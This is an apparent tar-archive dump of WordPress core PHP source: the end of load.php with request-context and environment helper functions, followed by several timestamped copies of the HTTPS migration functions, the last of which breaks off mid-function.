* Default false.
*/
return (bool) apply_filters( 'is_protected_endpoint', false );
}
/**
* Determines whether we are currently handling an Ajax action that should be protected against WSODs.
*
* @since 5.2.0
*
* @return bool True if the current Ajax action should be protected.
*/
function is_protected_ajax_action() {
if ( ! wp_doing_ajax() ) {
return false;
}
if ( ! isset( $_REQUEST['action'] ) ) {
return false;
}
$actions_to_protect = array(
'edit-theme-plugin-file', // Saving changes in the core code editor.
'heartbeat', // Keep the heart beating.
'install-plugin', // Installing a new plugin.
'install-theme', // Installing a new theme.
'search-plugins', // Searching in the list of plugins.
'search-install-plugins', // Searching for a plugin in the plugin install screen.
'update-plugin', // Update an existing plugin.
'update-theme', // Update an existing theme.
'activate-plugin', // Activating an existing plugin.
);
/**
* Filters the array of protected Ajax actions.
*
* This filter is only fired when doing Ajax and the Ajax request has an 'action' property.
*
* @since 5.2.0
*
* @param string[] $actions_to_protect Array of strings with Ajax actions to protect.
*/
$actions_to_protect = (array) apply_filters( 'wp_protected_ajax_actions', $actions_to_protect );
if ( ! in_array( $_REQUEST['action'], $actions_to_protect, true ) ) {
return false;
}
return true;
}
/**
* Sets internal encoding.
*
* In most cases the default internal encoding is latin1, which is
* of no use, since we want to use the `mb_` functions for `utf-8` strings.
*
* @since 3.0.0
* @access private
*/
function wp_set_internal_encoding() {
if ( function_exists( 'mb_internal_encoding' ) ) {
$charset = get_option( 'blog_charset' );
// phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged
if ( ! $charset || ! @mb_internal_encoding( $charset ) ) {
mb_internal_encoding( 'UTF-8' );
}
}
}
/**
* Adds magic quotes to `$_GET`, `$_POST`, `$_COOKIE`, and `$_SERVER`.
*
* Also forces `$_REQUEST` to be `$_GET + $_POST`. If `$_SERVER`,
* `$_COOKIE`, or `$_ENV` are needed, use those superglobals directly.
*
* @since 3.0.0
* @access private
*/
function wp_magic_quotes() {
// Escape with wpdb.
$_GET = add_magic_quotes( $_GET );
$_POST = add_magic_quotes( $_POST );
$_COOKIE = add_magic_quotes( $_COOKIE );
$_SERVER = add_magic_quotes( $_SERVER );
// Force REQUEST to be GET + POST.
$_REQUEST = array_merge( $_GET, $_POST );
}
/**
* Runs just before PHP shuts down execution.
*
* @since 1.2.0
* @access private
*/
function shutdown_action_hook() {
/**
* Fires just before PHP shuts down execution.
*
* @since 1.2.0
*/
do_action( 'shutdown' );
wp_cache_close();
}
/**
* Clones an object.
*
* @since 2.7.0
* @deprecated 3.2.0
*
* @param object $input_object The object to clone.
* @return object The cloned object.
*/
function wp_clone( $input_object ) {
// Use parens for clone to accommodate PHP 4. See #17880.
return clone( $input_object );
}
/**
* Determines whether the current request is for the login screen.
*
* @since 6.1.0
*
* @see wp_login_url()
*
* @return bool True if inside WordPress login screen, false otherwise.
*/
function is_login() {
return false !== stripos( wp_login_url(), $_SERVER['SCRIPT_NAME'] );
}
/**
* Determines whether the current request is for an administrative interface page.
*
* Does not check if the user is an administrator; use current_user_can()
* for checking roles and capabilities.
*
* For more information on this and similar theme functions, check out
* the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
* Conditional Tags} article in the Theme Developer Handbook.
*
* @since 1.5.1
*
* @global WP_Screen $current_screen WordPress current screen object.
*
* @return bool True if inside WordPress administration interface, false otherwise.
*/
function is_admin() {
if ( isset( $GLOBALS['current_screen'] ) ) {
return $GLOBALS['current_screen']->in_admin();
} elseif ( defined( 'WP_ADMIN' ) ) {
return WP_ADMIN;
}
return false;
}
/**
* Determines whether the current request is for a site's administrative interface.
*
* e.g. `/wp-admin/`
*
* Does not check if the user is an administrator; use current_user_can()
* for checking roles and capabilities.
*
* @since 3.1.0
*
* @global WP_Screen $current_screen WordPress current screen object.
*
* @return bool True if inside WordPress site administration pages.
*/
function is_blog_admin() {
if ( isset( $GLOBALS['current_screen'] ) ) {
return $GLOBALS['current_screen']->in_admin( 'site' );
} elseif ( defined( 'WP_BLOG_ADMIN' ) ) {
return WP_BLOG_ADMIN;
}
return false;
}
/**
* Determines whether the current request is for the network administrative interface.
*
* e.g. `/wp-admin/network/`
*
* Does not check if the user is an administrator; use current_user_can()
* for checking roles and capabilities.
*
* Does not check if the site is a Multisite network; use is_multisite()
* for checking if Multisite is enabled.
*
* @since 3.1.0
*
* @global WP_Screen $current_screen WordPress current screen object.
*
* @return bool True if inside WordPress network administration pages.
*/
function is_network_admin() {
if ( isset( $GLOBALS['current_screen'] ) ) {
return $GLOBALS['current_screen']->in_admin( 'network' );
} elseif ( defined( 'WP_NETWORK_ADMIN' ) ) {
return WP_NETWORK_ADMIN;
}
return false;
}
/**
* Determines whether the current request is for a user admin screen.
*
* e.g. `/wp-admin/user/`
*
* Does not check if the user is an administrator; use current_user_can()
* for checking roles and capabilities.
*
* @since 3.1.0
*
* @global WP_Screen $current_screen WordPress current screen object.
*
* @return bool True if inside WordPress user administration pages.
*/
function is_user_admin() {
if ( isset( $GLOBALS['current_screen'] ) ) {
return $GLOBALS['current_screen']->in_admin( 'user' );
} elseif ( defined( 'WP_USER_ADMIN' ) ) {
return WP_USER_ADMIN;
}
return false;
}
/**
* Determines whether Multisite is enabled.
*
* @since 3.0.0
*
* @return bool True if Multisite is enabled, false otherwise.
*/
function is_multisite() {
if ( defined( 'MULTISITE' ) ) {
return MULTISITE;
}
if ( defined( 'SUBDOMAIN_INSTALL' ) || defined( 'VHOST' ) || defined( 'SUNRISE' ) ) {
return true;
}
return false;
}
/**
* Converts a value to non-negative integer.
*
* @since 2.5.0
*
* @param mixed $maybeint Data you wish to have converted to a non-negative integer.
* @return int A non-negative integer.
*/
function absint( $maybeint ) {
return abs( (int) $maybeint );
}
/**
* Retrieves the current site ID.
*
* @since 3.1.0
*
* @global int $blog_id
*
* @return int Site ID.
*/
function get_current_blog_id() {
global $blog_id;
return absint( $blog_id );
}
/**
* Retrieves the current network ID.
*
* @since 4.6.0
*
* @return int The ID of the current network.
*/
function get_current_network_id() {
if ( ! is_multisite() ) {
return 1;
}
$current_network = get_network();
if ( ! isset( $current_network->id ) ) {
return get_main_network_id();
}
return absint( $current_network->id );
}
/**
* Attempts an early load of translations.
*
* Used for errors encountered during the initial loading process, before
* the locale has been properly detected and loaded.
*
* Designed for unusual load sequences (like setup-config.php) or for when
* the script will then terminate with an error, otherwise there is a risk
* that a file can be double-included.
*
* @since 3.4.0
* @access private
*
* @global WP_Textdomain_Registry $wp_textdomain_registry WordPress Textdomain Registry.
* @global WP_Locale $wp_locale WordPress date and time locale object.
*/
function wp_load_translations_early() {
global $wp_textdomain_registry, $wp_locale;
static $loaded = false;
if ( $loaded ) {
return;
}
$loaded = true;
if ( function_exists( 'did_action' ) && did_action( 'init' ) ) {
return;
}
// We need $wp_local_package.
require ABSPATH . WPINC . '/version.php';
// Translation and localization.
require_once ABSPATH . WPINC . '/pomo/mo.php';
require_once ABSPATH . WPINC . '/l10n/class-wp-translation-controller.php';
require_once ABSPATH . WPINC . '/l10n/class-wp-translations.php';
require_once ABSPATH . WPINC . '/l10n/class-wp-translation-file.php';
require_once ABSPATH . WPINC . '/l10n/class-wp-translation-file-mo.php';
require_once ABSPATH . WPINC . '/l10n/class-wp-translation-file-php.php';
require_once ABSPATH . WPINC . '/l10n.php';
require_once ABSPATH . WPINC . '/class-wp-textdomain-registry.php';
require_once ABSPATH . WPINC . '/class-wp-locale.php';
require_once ABSPATH . WPINC . '/class-wp-locale-switcher.php';
// General libraries.
require_once ABSPATH . WPINC . '/plugin.php';
$locales = array();
$locations = array();
if ( ! $wp_textdomain_registry instanceof WP_Textdomain_Registry ) {
$wp_textdomain_registry = new WP_Textdomain_Registry();
}
while ( true ) {
if ( defined( 'WPLANG' ) ) {
if ( '' === WPLANG ) {
break;
}
$locales[] = WPLANG;
}
if ( isset( $wp_local_package ) ) {
$locales[] = $wp_local_package;
}
if ( ! $locales ) {
break;
}
if ( defined( 'WP_LANG_DIR' ) && @is_dir( WP_LANG_DIR ) ) {
$locations[] = WP_LANG_DIR;
}
if ( defined( 'WP_CONTENT_DIR' ) && @is_dir( WP_CONTENT_DIR . '/languages' ) ) {
$locations[] = WP_CONTENT_DIR . '/languages';
}
if ( @is_dir( ABSPATH . 'wp-content/languages' ) ) {
$locations[] = ABSPATH . 'wp-content/languages';
}
if ( @is_dir( ABSPATH . WPINC . '/languages' ) ) {
$locations[] = ABSPATH . WPINC . '/languages';
}
if ( ! $locations ) {
break;
}
$locations = array_unique( $locations );
foreach ( $locales as $locale ) {
foreach ( $locations as $location ) {
if ( file_exists( $location . '/' . $locale . '.mo' ) ) {
load_textdomain( 'default', $location . '/' . $locale . '.mo', $locale );
if ( defined( 'WP_SETUP_CONFIG' ) && file_exists( $location . '/admin-' . $locale . '.mo' ) ) {
load_textdomain( 'default', $location . '/admin-' . $locale . '.mo', $locale );
}
break 2;
}
}
}
break;
}
$wp_locale = new WP_Locale();
}
/**
* Checks or sets whether WordPress is in "installation" mode.
*
* If the `WP_INSTALLING` constant is defined during the bootstrap, `wp_installing()` will default to `true`.
*
* @since 4.4.0
*
* @param bool $is_installing Optional. True to set WP into Installing mode, false to turn Installing mode off.
* Omit this parameter if you only want to fetch the current status.
* @return bool True if WP is installing, otherwise false. When a `$is_installing` is passed, the function will
* report whether WP was in installing mode prior to the change to `$is_installing`.
*/
function wp_installing( $is_installing = null ) {
static $installing = null;
// Support for the `WP_INSTALLING` constant, defined before WP is loaded.
if ( is_null( $installing ) ) {
$installing = defined( 'WP_INSTALLING' ) && WP_INSTALLING;
}
if ( ! is_null( $is_installing ) ) {
$old_installing = $installing;
$installing = $is_installing;
return (bool) $old_installing;
}
return (bool) $installing;
}
/**
* Determines if SSL is used.
*
* @since 2.6.0
* @since 4.6.0 Moved from functions.php to load.php.
*
* @return bool True if SSL, otherwise false.
*/
function is_ssl() {
if ( isset( $_SERVER['HTTPS'] ) ) {
if ( 'on' === strtolower( $_SERVER['HTTPS'] ) ) {
return true;
}
if ( '1' === (string) $_SERVER['HTTPS'] ) {
return true;
}
} elseif ( isset( $_SERVER['SERVER_PORT'] ) && ( '443' === (string) $_SERVER['SERVER_PORT'] ) ) {
return true;
}
return false;
}
/**
* Converts a shorthand byte value to an integer byte value.
*
* @since 2.3.0
* @since 4.6.0 Moved from media.php to load.php.
*
* @link https://www.php.net/manual/en/function.ini-get.php
* @link https://www.php.net/manual/en/faq.using.php#faq.using.shorthandbytes
*
* @param string $value A (PHP ini) byte value, either shorthand or ordinary.
* @return int An integer byte value.
*/
function wp_convert_hr_to_bytes( $value ) {
$value = strtolower( trim( $value ) );
$bytes = (int) $value;
if ( str_contains( $value, 'g' ) ) {
$bytes *= GB_IN_BYTES;
} elseif ( str_contains( $value, 'm' ) ) {
$bytes *= MB_IN_BYTES;
} elseif ( str_contains( $value, 'k' ) ) {
$bytes *= KB_IN_BYTES;
}
// Deal with large (float) values which run into the maximum integer size.
return min( $bytes, PHP_INT_MAX );
}
/**
* Determines whether a PHP ini value is changeable at runtime.
*
* @since 4.6.0
*
* @link https://www.php.net/manual/en/function.ini-get-all.php
*
* @param string $setting The name of the ini setting to check.
* @return bool True if the value is changeable at runtime. False otherwise.
*/
function wp_is_ini_value_changeable( $setting ) {
static $ini_all;
if ( ! isset( $ini_all ) ) {
$ini_all = false;
// Sometimes `ini_get_all()` is disabled via the `disable_functions` option for "security purposes".
if ( function_exists( 'ini_get_all' ) ) {
$ini_all = ini_get_all();
}
}
if ( isset( $ini_all[ $setting ]['access'] )
&& ( INI_ALL === $ini_all[ $setting ]['access'] || INI_USER === $ini_all[ $setting ]['access'] )
) {
return true;
}
// If we were unable to retrieve the details, fail gracefully to assume it's changeable.
if ( ! is_array( $ini_all ) ) {
return true;
}
return false;
}
/**
* Determines whether the current request is a WordPress Ajax request.
*
* @since 4.7.0
*
* @return bool True if it's a WordPress Ajax request, false otherwise.
*/
function wp_doing_ajax() {
/**
* Filters whether the current request is a WordPress Ajax request.
*
* @since 4.7.0
*
* @param bool $wp_doing_ajax Whether the current request is a WordPress Ajax request.
*/
return apply_filters( 'wp_doing_ajax', defined( 'DOING_AJAX' ) && DOING_AJAX );
}
/**
* Determines whether the current request should use themes.
*
* @since 5.1.0
*
* @return bool True if themes should be used, false otherwise.
*/
function wp_using_themes() {
/**
* Filters whether the current request should use themes.
*
* @since 5.1.0
*
* @param bool $wp_using_themes Whether the current request should use themes.
*/
return apply_filters( 'wp_using_themes', defined( 'WP_USE_THEMES' ) && WP_USE_THEMES );
}
/**
* Determines whether the current request is a WordPress cron request.
*
* @since 4.8.0
*
* @return bool True if it's a WordPress cron request, false otherwise.
*/
function wp_doing_cron() {
/**
* Filters whether the current request is a WordPress cron request.
*
* @since 4.8.0
*
* @param bool $wp_doing_cron Whether the current request is a WordPress cron request.
*/
return apply_filters( 'wp_doing_cron', defined( 'DOING_CRON' ) && DOING_CRON );
}
/**
* Checks whether the given variable is a WordPress Error.
*
* Returns whether `$thing` is an instance of the `WP_Error` class.
*
* @since 2.1.0
*
* @param mixed $thing The variable to check.
* @return bool Whether the variable is an instance of WP_Error.
*/
function is_wp_error( $thing ) {
$is_wp_error = ( $thing instanceof WP_Error );
if ( $is_wp_error ) {
/**
* Fires when `is_wp_error()` is called and its parameter is an instance of `WP_Error`.
*
* @since 5.6.0
*
* @param WP_Error $thing The error object passed to `is_wp_error()`.
*/
do_action( 'is_wp_error_instance', $thing );
}
return $is_wp_error;
}
/**
* Determines whether file modifications are allowed.
*
* @since 4.8.0
*
* @param string $context The usage context.
* @return bool True if file modification is allowed, false otherwise.
*/
function wp_is_file_mod_allowed( $context ) {
/**
* Filters whether file modifications are allowed.
*
* @since 4.8.0
*
* @param bool $file_mod_allowed Whether file modifications are allowed.
* @param string $context The usage context.
*/
return apply_filters( 'file_mod_allowed', ! defined( 'DISALLOW_FILE_MODS' ) || ! DISALLOW_FILE_MODS, $context );
}
/**
* Starts scraping edited file errors.
*
* @since 4.9.0
*/
function wp_start_scraping_edited_file_errors() {
if ( ! isset( $_REQUEST['wp_scrape_key'] ) || ! isset( $_REQUEST['wp_scrape_nonce'] ) ) {
return;
}
$key = substr( sanitize_key( wp_unslash( $_REQUEST['wp_scrape_key'] ) ), 0, 32 );
$nonce = wp_unslash( $_REQUEST['wp_scrape_nonce'] );
if ( empty( $key ) || empty( $nonce ) ) {
return;
}
$transient = get_transient( 'scrape_key_' . $key );
if ( false === $transient ) {
return;
}
if ( $transient !== $nonce ) {
if ( ! headers_sent() ) {
header( 'X-Robots-Tag: noindex' );
nocache_headers();
}
echo "###### wp_scraping_result_start:$key ######";
echo wp_json_encode(
array(
'code' => 'scrape_nonce_failure',
'message' => __( 'Scrape key check failed. Please try again.' ),
)
);
echo "###### wp_scraping_result_end:$key ######";
die();
}
if ( ! defined( 'WP_SANDBOX_SCRAPING' ) ) {
define( 'WP_SANDBOX_SCRAPING', true );
}
register_shutdown_function( 'wp_finalize_scraping_edited_file_errors', $key );
}
/**
* Finalizes scraping for edited file errors.
*
* @since 4.9.0
*
* @param string $scrape_key Scrape key.
*/
function wp_finalize_scraping_edited_file_errors( $scrape_key ) {
$error = error_get_last();
echo "\n###### wp_scraping_result_start:$scrape_key ######\n";
if ( ! empty( $error )
&& in_array( $error['type'], array( E_CORE_ERROR, E_COMPILE_ERROR, E_ERROR, E_PARSE, E_USER_ERROR, E_RECOVERABLE_ERROR ), true )
) {
$error = str_replace( ABSPATH, '', $error );
echo wp_json_encode( $error );
} else {
echo wp_json_encode( true );
}
echo "\n###### wp_scraping_result_end:$scrape_key ######\n";
}
/**
* Checks whether current request is a JSON request, or is expecting a JSON response.
*
* @since 5.0.0
*
* @return bool True if `Accepts` or `Content-Type` headers contain `application/json`.
* False otherwise.
*/
function wp_is_json_request() {
if ( isset( $_SERVER['HTTP_ACCEPT'] ) && wp_is_json_media_type( $_SERVER['HTTP_ACCEPT'] ) ) {
return true;
}
if ( isset( $_SERVER['CONTENT_TYPE'] ) && wp_is_json_media_type( $_SERVER['CONTENT_TYPE'] ) ) {
return true;
}
return false;
}
/**
* Checks whether current request is a JSONP request, or is expecting a JSONP response.
*
* @since 5.2.0
*
* @return bool True if JSONP request, false otherwise.
*/
function wp_is_jsonp_request() {
if ( ! isset( $_GET['_jsonp'] ) ) {
return false;
}
if ( ! function_exists( 'wp_check_jsonp_callback' ) ) {
require_once ABSPATH . WPINC . '/functions.php';
}
$jsonp_callback = $_GET['_jsonp'];
if ( ! wp_check_jsonp_callback( $jsonp_callback ) ) {
return false;
}
/** This filter is documented in wp-includes/rest-api/class-wp-rest-server.php */
$jsonp_enabled = apply_filters( 'rest_jsonp_enabled', true );
return $jsonp_enabled;
}
/**
* Checks whether a string is a valid JSON Media Type.
*
* @since 5.6.0
*
* @param string $media_type A Media Type string to check.
* @return bool True if string is a valid JSON Media Type.
*/
function wp_is_json_media_type( $media_type ) {
static $cache = array();
if ( ! isset( $cache[ $media_type ] ) ) {
$cache[ $media_type ] = (bool) preg_match( '/(^|\s|,)application\/([\w!#\$&-\^\.\+]+\+)?json(\+oembed)?($|\s|;|,)/i', $media_type );
}
return $cache[ $media_type ];
}
/**
* Checks whether current request is an XML request, or is expecting an XML response.
*
* @since 5.2.0
*
* @return bool True if `Accepts` or `Content-Type` headers contain `text/xml`
* or one of the related MIME types. False otherwise.
*/
function wp_is_xml_request() {
$accepted = array(
'text/xml',
'application/rss+xml',
'application/atom+xml',
'application/rdf+xml',
'text/xml+oembed',
'application/xml+oembed',
);
if ( isset( $_SERVER['HTTP_ACCEPT'] ) ) {
foreach ( $accepted as $type ) {
if ( str_contains( $_SERVER['HTTP_ACCEPT'], $type ) ) {
return true;
}
}
}
if ( isset( $_SERVER['CONTENT_TYPE'] ) && in_array( $_SERVER['CONTENT_TYPE'], $accepted, true ) ) {
return true;
}
return false;
}
/**
* Checks if this site is protected by HTTP Basic Auth.
*
* At the moment, this merely checks for the present of Basic Auth credentials. Therefore, calling
* this function with a context different from the current context may give inaccurate results.
* In a future release, this evaluation may be made more robust.
*
* Currently, this is only used by Application Passwords to prevent a conflict since it also utilizes
* Basic Auth.
*
* @since 5.6.1
*
* @global string $pagenow The filename of the current screen.
*
* @param string $context The context to check for protection. Accepts 'login', 'admin', and 'front'.
* Defaults to the current context.
* @return bool Whether the site is protected by Basic Auth.
*/
function wp_is_site_protected_by_basic_auth( $context = '' ) {
global $pagenow;
if ( ! $context ) {
if ( 'wp-login.php' === $pagenow ) {
$context = 'login';
} elseif ( is_admin() ) {
$context = 'admin';
} else {
$context = 'front';
}
}
$is_protected = ! empty( $_SERVER['PHP_AUTH_USER'] ) || ! empty( $_SERVER['PHP_AUTH_PW'] );
/**
* Filters whether a site is protected by HTTP Basic Auth.
*
* @since 5.6.1
*
* @param bool $is_protected Whether the site is protected by Basic Auth.
* @param string $context The context to check for protection. One of 'login', 'admin', or 'front'.
*/
return apply_filters( 'wp_is_site_protected_by_basic_auth', $is_protected, $context );
}
https-migration-20260605175105-20260621081205-20260621181318.php 0000666 00000011205 15224151221 0014737 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260606103247-20260621081100.php 0000666 00000011205 15224151221 0013342 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605201229.php 0000666 00000011205 15224151221 0011766 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
